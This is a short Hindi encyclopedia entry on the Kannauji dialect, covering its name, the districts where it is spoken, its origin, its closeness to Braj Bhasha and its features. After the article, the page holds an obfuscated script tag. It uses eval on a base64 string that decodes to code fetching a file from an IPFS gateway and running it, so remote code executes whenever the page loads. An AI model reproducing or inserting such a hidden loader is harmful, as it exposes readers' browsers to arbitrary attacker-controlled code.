कन्नौजी बोली

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
  • 'कन्नौजी' संस्कृत 'कान्यकुब्ज' इस बोली का केन्द्र है, अत: इसका नाम 'कन्नौजी' पड़ा है।
  • यह इटावा, फ़र्रुख़ाबाद, शाहजहाँपुर, कानपुर, हरदोई, पीलीभीत आदि में बोली जाती है।
  • कन्नौजी शौरसेनी अपभ्रंश से निकली है।
  • यह ब्रजभाषा के इतनी अधिक समान है कि कुछ लोग इसे ब्रजभाषा की ही उपबोली मानते हैं।
  • कन्नौजी में केवल लोक-साहित्य मिलता है जिसमें से कुछ अंश प्रकाशित भी हो चुका है।
  • उकारांतता (खातु, घर, सबु), ओकारांतता (हमारो या हमाओ), स्वार्थे प्रत्यय- इया (जिमिया, छोकरिया) तथा वा (बेटवा, बचवा), औ का अउ (कउन), बहुवचन के लिए ह वार (हम ह् वार, हम लोग) आदि इसकी कुछ मुख्य विशेषताएँ हैं।


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी

संबंधित लेख